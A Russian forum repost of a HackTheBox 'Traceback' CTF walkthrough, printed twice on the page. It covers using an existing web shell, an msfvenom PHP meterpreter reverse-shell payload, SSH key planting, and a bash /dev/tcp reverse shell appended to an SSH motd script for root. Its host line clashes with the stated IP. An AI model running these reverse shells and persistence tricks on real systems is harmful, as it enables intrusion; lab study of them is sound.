[Информационная безопасность, Lua, CTF] HackTheBox. Прохождение Traceback. Бэкдор, LUA, SSH
Автор
Сообщение
news_bot ®
Стаж: 6 лет 4 месяца
Сообщений: 27286
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/54c8629ed0f44018f0bb48250c42a2bd.png)
Продолжаю публикацию решений отправленных на дорешивание машин с площадки HackTheBox.
В данной статье эксплуатируем чей-то бэкдор, получаем шелл через Luvit и возимся с SSH для LPE.
Подключение к лаборатории осуществляется через VPN. Рекомендуется не подключаться с рабочего компьютера или с хоста, где имеются важные для вас данные, так как Вы попадаете в частную сеть с людьми, которые что-то да умеют в области ИБ.
Организационная информация
SPL
Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Recon
Данная машина имеет IP адрес 10.10.10.174, который я добавляю в /etc/hosts.
10.10.10.181 fatty.htb
Первым делом сканируем открытые порты. Так как сканировать все порты nmap’ом долго, то я сначала сделаю это с помощью masscan. Мы сканируем все TCP и UDP порты с интерфейса tun0 со скоростью 500 пакетов в секунду.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.181 --rate=500
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/b26b25e56fdc23241514072b3f9e7f82.png)
Теперь для получения более подробной информации о сервисах, которые работают на портах, запустим сканирование с опцией -А.
nmap -A traceback.htb -p22,80
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/01c0e3904092c5e3128a264d902289cd.png)
На хосте работают служба SSH и веб сервер. Зайдя на веб сервер ничего не обнаружим, кроме послания.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/2ce8972d7afc36c3c6c9fd997dc748f0.png)
Но находим что-то интересное в исходном коде.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/ab82fee7ef342ba4379082160de19e13.png)
Но погуглив данную строку, выходим на эту страницу github.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/c90fbdb736ae05f68dc9fa055dd32b3b.png)
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/75813cdc958172e22da5250990b6fcca.png)
Entry Point
Перебирая данные файлы, определяем, что на сервер загружен файл smevk.php.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/90df87999955621a077b5be0ad3f9ad3.png)
В исходном коде на гитхабе находим учетные данные по умолчанию и авторизуемся.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/edf7adfbf6a489ca41b739778ca2da72.png)
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/2babbbb5fb1b368f2cde3c8902df83ec.png)
Давайте сгенерируем PHP шелл и запустим листенер.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.15.60 LPORT=4321 -f raw > r.php
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/ea3c76c3407587189f0bd1fedf5b4431.png)
Теперь загрузим шелл и обратимся к нему. Получаем сессию meterpreter.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/f25f3886136a5462fc3a6437773f978d.png)
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/279f9f0c2bbb81a52ba7bafee0a1dd48.png)
USER
В домашней директории пользователя находим файлы и записку к ним.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/67b9ff58db7562bb100ad61a0c37539b.png)
А также от имени пользователя sysadmin можно запустить lua скрипт.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/b1b384e2d30d94774bddafb8f098f138.png)
Давайте запустим шелл.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/5e7aed563559afcf971138f72137a5ca.png)
Для удобства кинем SSH ключ. Для этого сгенерируем пару открытый/закрытый и запишем открытый в authorized_keys.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/f24abed84082016217ee8699b9c61065.png)
А теперь подключимся с помощью закрытого и заберем флаг.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/638b7800b862b70593fc9bb039331012.png)
ROOT
Запустим скрипт базового перечисления LinPEAS. И в отчете найдем интересные файлы для записи.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/dbd2b815a12d7ee9dcb6d7a70ece77da.png)
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/6f52440f5c6449d8bdf9d66428d95f31.png)
Таким образом, файл /etc/update-motd.d/00-header выполняется каждый раз, когда происходит подключение по SSH. Давайте проверим с помощью pspy. Запустим данную утилиту и подключимся по SSH.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/d628698da276a35b81974343506e892f.png)
Давайте допишем реверс шелл в данный файл.
echo “bash -i >& /dev/tcp/10.10.15.60/5432 0>&1” >> /etc/update-motd.d/00-header
Теперь сразу подключимся и увидим обратное подключение на наш хост.
![Клик для увеличения](https://linkme.ufanet.ru/box/200x100/1f57adc9c405755b7becf5f6e7cc16ea.png)
Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ.
===========
Источник:
habr.com
===========
Похожие новости:
- [Информационная безопасность, Разработка под Windows] Автоматизация обнаружения возможных путей перехвата DLL (DLL Hijacks) (перевод)
- [Информационная безопасность, Реверс-инжиниринг] Руткиты на основе BIOS. Часть 2 (перевод)
- [Информационная безопасность, Криптография] Какова оптимальная длина пароля? (перевод)
- [Информационная безопасность, Старое железо, Транспорт] Pen Test Partners: обновления ПО самолётов Boeing 747 поставлялись на дискетах
- [Информационная безопасность] Вы просили подсказку? Мы ее вам дадим
- [Информационная безопасность] Приватность в Telegram
- [Информационная безопасность, Гаджеты] В чипе Qualcomm Snapdragon нашли более 400 уязвимостей
- [Информационная безопасность, Беспроводные технологии] Атака недели: голосовые звонки в LTE (ReVoLTE) (перевод)
- [Информационная безопасность, Сетевые технологии, Сетевое оборудование] Как траблшутить отечественный IPsec VPN. Часть 1
- [Информационная безопасность] Безопасна ли ваша банковская карта с чипом? Зависит от банка (перевод)
Теги для поиска: #_informatsionnaja_bezopasnost (Информационная безопасность), #_lua, #_ctf, #_pentest, #_pentesting, #_ralf_rt, #_informatsionnaja_bezopasnost (информационная безопасность), #_ctf, #_htb, #_red_team, #_red_teaming, #_informatsionnaja_bezopasnost (
Информационная безопасность
), #_lua, #_ctf
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 06-Июл 09:55
Часовой пояс: UTC + 5
Автор | Сообщение |
---|---|
news_bot ®
Стаж: 6 лет 4 месяца |
|
![]() Продолжаю публикацию решений отправленных на дорешивание машин с площадки HackTheBox. В данной статье эксплуатируем чей-то бэкдор, получаем шелл через Luvit и возимся с SSH для LPE. Подключение к лаборатории осуществляется через VPN. Рекомендуется не подключаться с рабочего компьютера или с хоста, где имеются важные для вас данные, так как Вы попадаете в частную сеть с людьми, которые что-то да умеют в области ИБ. Организационная информацияSPLЧтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа. Recon Данная машина имеет IP адрес 10.10.10.174, который я добавляю в /etc/hosts. 10.10.10.181 fatty.htb
Первым делом сканируем открытые порты. Так как сканировать все порты nmap’ом долго, то я сначала сделаю это с помощью masscan. Мы сканируем все TCP и UDP порты с интерфейса tun0 со скоростью 500 пакетов в секунду. masscan -e tun0 -p1-65535,U:1-65535 10.10.10.181 --rate=500
![]() Теперь для получения более подробной информации о сервисах, которые работают на портах, запустим сканирование с опцией -А. nmap -A traceback.htb -p22,80
![]() На хосте работают служба SSH и веб сервер. Зайдя на веб сервер ничего не обнаружим, кроме послания. ![]() Но находим что-то интересное в исходном коде. ![]() Но погуглив данную строку, выходим на эту страницу github. ![]() ![]() Entry Point Перебирая данные файлы, определяем, что на сервер загружен файл smevk.php. ![]() В исходном коде на гитхабе находим учетные данные по умолчанию и авторизуемся. ![]() ![]() Давайте сгенерируем PHP шелл и запустим листенер. msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.15.60 LPORT=4321 -f raw > r.php
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php ![]() Теперь загрузим шелл и обратимся к нему. Получаем сессию meterpreter. ![]() ![]() USER В домашней директории пользователя находим файлы и записку к ним. ![]() А также от имени пользователя sysadmin можно запустить lua скрипт. ![]() Давайте запустим шелл. ![]() Для удобства кинем SSH ключ. Для этого сгенерируем пару открытый/закрытый и запишем открытый в authorized_keys. ![]() А теперь подключимся с помощью закрытого и заберем флаг. ![]() ROOT Запустим скрипт базового перечисления LinPEAS. И в отчете найдем интересные файлы для записи. ![]() ![]() Таким образом, файл /etc/update-motd.d/00-header выполняется каждый раз, когда происходит подключение по SSH. Давайте проверим с помощью pspy. Запустим данную утилиту и подключимся по SSH. ![]() Давайте допишем реверс шелл в данный файл. echo “bash -i >& /dev/tcp/10.10.15.60/5432 0>&1” >> /etc/update-motd.d/00-header
Теперь сразу подключимся и увидим обратное подключение на наш хост. ![]() Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ. =========== Источник: habr.com =========== Похожие новости:
Информационная безопасность ), #_lua, #_ctf |
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 06-Июл 09:55
Часовой пояс: UTC + 5